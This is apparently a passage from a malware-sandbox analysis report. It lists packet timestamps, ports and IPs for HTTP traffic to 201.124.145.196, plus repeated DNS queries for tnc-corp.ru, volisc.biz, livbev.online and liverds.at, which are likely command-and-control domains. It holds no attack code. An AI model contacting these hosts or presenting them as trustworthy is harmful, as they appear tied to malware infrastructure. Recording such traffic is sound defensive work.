Oct 24, 2024 18:40:45.539627075 CEST | 80 | 58685 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:41:02.543734074 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:02.565335035 CEST | 80 | 58686 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:41:02.565501928 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:02.565610886 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:02.565638065 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:02.571108103 CEST | 80 | 58686 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:41:02.571614027 CEST | 80 | 58686 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:41:03.377175093 CEST | 80 | 58686 | 201.124.145.196 | 192.168.2.4
Oct 24, 2024 18:41:03.377372026 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:03.380084991 CEST | 58686 | 80 | 192.168.2.4 | 201.124.145.196
Oct 24, 2024 18:41:03.385701895 CEST | 80 | 58686 | 201.124.145.196 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 18:37:36.562937975 CEST | 62460 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:37.560062885 CEST | 62460 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:38.575629950 CEST | 62460 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:38.807322979 CEST | 53 | 62460 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:38.807343960 CEST | 53 | 62460 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:38.807356119 CEST | 53 | 62460 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:39.708722115 CEST | 54685 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:40.700933933 CEST | 54685 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:41.716922045 CEST | 54685 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:43.731969118 CEST | 54685 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:45.982157946 CEST | 53 | 54685 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:45.982176065 CEST | 53 | 54685 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:45.982188940 CEST | 53 | 54685 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:45.982542992 CEST | 53 | 54685 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:45.990561962 CEST | 63838 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:46.001085043 CEST | 53 | 63838 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:46.004443884 CEST | 59949 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:46.997514009 CEST | 59949 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:48.013371944 CEST | 59949 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:50.043087006 CEST | 59949 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:37:52.265104055 CEST | 53 | 59949 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:52.265126944 CEST | 53 | 59949 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:52.265140057 CEST | 53 | 59949 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:37:52.265301943 CEST | 53 | 59949 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:38:58.528233051 CEST | 51766 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:38:59.517595053 CEST | 51766 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:00.532829046 CEST | 51766 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:02.544687986 CEST | 51766 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:04.717839956 CEST | 53 | 51766 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:04.717888117 CEST | 53 | 51766 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:04.717899084 CEST | 53 | 51766 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:04.717907906 CEST | 53 | 51766 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:04.782851934 CEST | 57447 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:04.793390036 CEST | 53 | 57447 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:04.871172905 CEST | 61679 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:05.873804092 CEST | 61679 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:06.894021034 CEST | 61679 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:08.894138098 CEST | 61679 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:11.105513096 CEST | 53 | 61679 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:11.105526924 CEST | 53 | 61679 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:11.105535030 CEST | 53 | 61679 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:11.105869055 CEST | 53 | 61679 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:12.166372061 CEST | 51673 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:13.153822899 CEST | 51673 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:13.161305904 CEST | 53 | 51673 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:18.460525036 CEST | 53 | 51673 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:20.863650084 CEST | 64363 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:20.873910904 CEST | 53 | 64363 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:20.897675037 CEST | 65165 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:21.888170958 CEST | 65165 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:22.904638052 CEST | 65165 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:24.919538021 CEST | 65165 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:27.112010002 CEST | 53 | 65165 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:27.112081051 CEST | 53 | 65165 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:27.112111092 CEST | 53 | 65165 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:27.112143040 CEST | 53 | 65165 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:31.873675108 CEST | 52537 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:32.872932911 CEST | 52537 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:32.880987883 CEST | 53 | 52537 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:38.116784096 CEST | 53 | 52537 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:40.589396954 CEST | 59400 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:40.602171898 CEST | 53 | 59400 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:40.604391098 CEST | 56105 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:41.592582941 CEST | 56105 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:42.609253883 CEST | 56105 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:44.624702930 CEST | 56105 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:46.820019007 CEST | 53 | 56105 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:46.820038080 CEST | 53 | 56105 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:46.820044041 CEST | 53 | 56105 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:46.820339918 CEST | 53 | 56105 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:51.826590061 CEST | 49186 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:52.845719099 CEST | 49186 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:53.858628035 CEST | 49186 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:55.876540899 CEST | 49186 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:58.078646898 CEST | 53 | 49186 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:58.078690052 CEST | 53 | 49186 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:58.078747988 CEST | 53 | 49186 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:58.078775883 CEST | 53 | 49186 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:58.101263046 CEST | 62768 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:58.111707926 CEST | 53 | 62768 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:39:58.113786936 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:39:59.107065916 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:00.125298977 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:02.138252020 CEST | 56440 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:04.223443985 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:04.223489046 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:04.223519087 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:04.223643064 CEST | 53 | 56440 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:09.297966003 CEST | 63112 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:10.294504881 CEST | 63112 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:11.310251951 CEST | 63112 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:11.609256029 CEST | 53 | 63112 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:11.609308958 CEST | 53 | 63112 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:11.609339952 CEST | 53 | 63112 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:12.359304905 CEST | 51031 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:13.372755051 CEST | 51031 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:14.388329029 CEST | 51031 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:16.405164957 CEST | 51031 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:18.584759951 CEST | 53 | 51031 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:18.584814072 CEST | 53 | 51031 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:18.584844112 CEST | 53 | 51031 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:18.584871054 CEST | 53 | 51031 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:18.596683025 CEST | 50723 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:18.607841015 CEST | 53 | 50723 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:18.610503912 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:19.622826099 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:20.622656107 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:22.638307095 CEST | 53235 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:22.690511942 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:22.690557003 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:22.690587997 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:22.690624952 CEST | 53 | 53235 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:27.322776079 CEST | 63634 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:28.315013885 CEST | 63634 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:29.332726955 CEST | 63634 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:31.327733994 CEST | 63634 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:33.543411016 CEST | 53 | 63634 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:33.543457985 CEST | 53 | 63634 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:33.543488026 CEST | 53 | 63634 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:33.543524027 CEST | 53 | 63634 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:33.547537088 CEST | 59129 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:33.558007956 CEST | 53 | 59129 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:33.560375929 CEST | 50813 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:34.565747976 CEST | 50813 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:35.564198971 CEST | 50813 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:37.954163074 CEST | 50813 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:39.825125933 CEST | 53 | 50813 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:39.825176001 CEST | 53 | 50813 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:39.825206041 CEST | 53 | 50813 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:39.825730085 CEST | 53 | 50813 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:45.712955952 CEST | 51407 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:46.724524975 CEST | 51407 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:47.736038923 CEST | 51407 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:49.733963013 CEST | 51407 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:51.966073036 CEST | 53 | 51407 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:51.966123104 CEST | 53 | 51407 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:51.966160059 CEST | 53 | 51407 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:51.966187954 CEST | 53 | 51407 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:51.980016947 CEST | 51548 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:51.989211082 CEST | 53 | 51548 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:51.991645098 CEST | 58951 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:53.001231909 CEST | 58951 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:54.016474962 CEST | 58951 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:56.034240961 CEST | 58951 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:40:58.242844105 CEST | 53 | 58951 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:58.242886066 CEST | 53 | 58951 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:58.242913961 CEST | 53 | 58951 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:40:58.243598938 CEST | 53 | 58951 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:03.453121901 CEST | 51713 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:04.451117039 CEST | 51713 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:05.466629982 CEST | 51713 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:07.466615915 CEST | 51713 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:09.679297924 CEST | 53 | 51713 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:09.679366112 CEST | 53 | 51713 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:09.679379940 CEST | 53 | 51713 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:09.679398060 CEST | 53 | 51713 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:09.685657978 CEST | 54716 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:09.694380999 CEST | 53 | 54716 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:09.702735901 CEST | 59762 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:10.718682051 CEST | 59762 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:11.716528893 CEST | 59762 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:13.716519117 CEST | 59762 | 53 | 192.168.2.4 | 1.1.1.1
Oct 24, 2024 18:41:16.406060934 CEST | 53 | 59762 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:16.406099081 CEST | 53 | 59762 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:16.406109095 CEST | 53 | 59762 | 1.1.1.1 | 192.168.2.4
Oct 24, 2024 18:41:16.406213045 CEST | 53 | 59762 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 18:37:36.562937975 CEST | 192.168.2.4 | 1.1.1.1 | 0x4adf | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:37.560062885 CEST | 192.168.2.4 | 1.1.1.1 | 0x4adf | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:38.575629950 CEST | 192.168.2.4 | 1.1.1.1 | 0x4adf | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:39.708722115 CEST | 192.168.2.4 | 1.1.1.1 | 0x7af7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:40.700933933 CEST | 192.168.2.4 | 1.1.1.1 | 0x7af7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:41.716922045 CEST | 192.168.2.4 | 1.1.1.1 | 0x7af7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:43.731969118 CEST | 192.168.2.4 | 1.1.1.1 | 0x7af7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:45.990561962 CEST | 192.168.2.4 | 1.1.1.1 | 0x3612 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:46.004443884 CEST | 192.168.2.4 | 1.1.1.1 | 0xb070 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:46.997514009 CEST | 192.168.2.4 | 1.1.1.1 | 0xb070 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:48.013371944 CEST | 192.168.2.4 | 1.1.1.1 | 0xb070 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:37:50.043087006 CEST | 192.168.2.4 | 1.1.1.1 | 0xb070 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:38:58.528233051 CEST | 192.168.2.4 | 1.1.1.1 | 0xaea2 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:38:59.517595053 CEST | 192.168.2.4 | 1.1.1.1 | 0xaea2 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:00.532829046 CEST | 192.168.2.4 | 1.1.1.1 | 0xaea2 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:02.544687986 CEST | 192.168.2.4 | 1.1.1.1 | 0xaea2 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:04.782851934 CEST | 192.168.2.4 | 1.1.1.1 | 0x1c4e | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:04.871172905 CEST | 192.168.2.4 | 1.1.1.1 | 0xed8a | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:05.873804092 CEST | 192.168.2.4 | 1.1.1.1 | 0xed8a | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:06.894021034 CEST | 192.168.2.4 | 1.1.1.1 | 0xed8a | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:08.894138098 CEST | 192.168.2.4 | 1.1.1.1 | 0xed8a | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:12.166372061 CEST | 192.168.2.4 | 1.1.1.1 | 0x2e23 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:39:13.153822899 CEST | 192.168.2.4 | 1.1.1.1 | 0x2e23 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
                                                      Oct 24, 2024 18:39:20.863650084 CEST192.168.2.41.1.1.10xda34Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:20.897675037 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:21.888170958 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:22.904638052 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:24.919538021 CEST192.168.2.41.1.1.10x236Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:31.873675108 CEST192.168.2.41.1.1.10x256bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:32.872932911 CEST192.168.2.41.1.1.10x256bStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.589396954 CEST192.168.2.41.1.1.10x6b8eStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.604391098 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:41.592582941 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:42.609253883 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:44.624702930 CEST192.168.2.41.1.1.10xd3a0Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:51.826590061 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:52.845719099 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:53.858628035 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:55.876540899 CEST192.168.2.41.1.1.10xe9dcStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.101263046 CEST192.168.2.41.1.1.10xf7faStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.113786936 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:59.107065916 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:00.125298977 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:02.138252020 CEST192.168.2.41.1.1.10x5143Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:09.297966003 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:10.294504881 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.310251951 CEST192.168.2.41.1.1.10xaf62Standard query (0)tnc-corp.ruA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:12.359304905 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:13.372755051 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:14.388329029 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:16.405164957 CEST192.168.2.41.1.1.10xed1fStandard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.596683025 CEST192.168.2.41.1.1.10x647dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.610503912 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:19.622826099 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:20.622656107 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.638307095 CEST192.168.2.41.1.1.10x4f05Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:27.322776079 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:28.315013885 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:29.332726955 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:31.327733994 CEST192.168.2.41.1.1.10xa3Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.547537088 CEST192.168.2.41.1.1.10xa1c4Standard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.560375929 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:34.565747976 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:35.564198971 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:37.954163074 CEST192.168.2.41.1.1.10x6fb9Standard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:45.712955952 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:46.724524975 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:47.736038923 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:49.733963013 CEST192.168.2.41.1.1.10x5737Standard query (0)volisc.bizA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.980016947 CEST192.168.2.41.1.1.10xc66dStandard query (0)livbev.onlineA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.991645098 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:53.001231909 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:54.016474962 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:56.034240961 CEST192.168.2.41.1.1.10x1c4bStandard query (0)liverds.atA (IP address)IN (0x0001)false
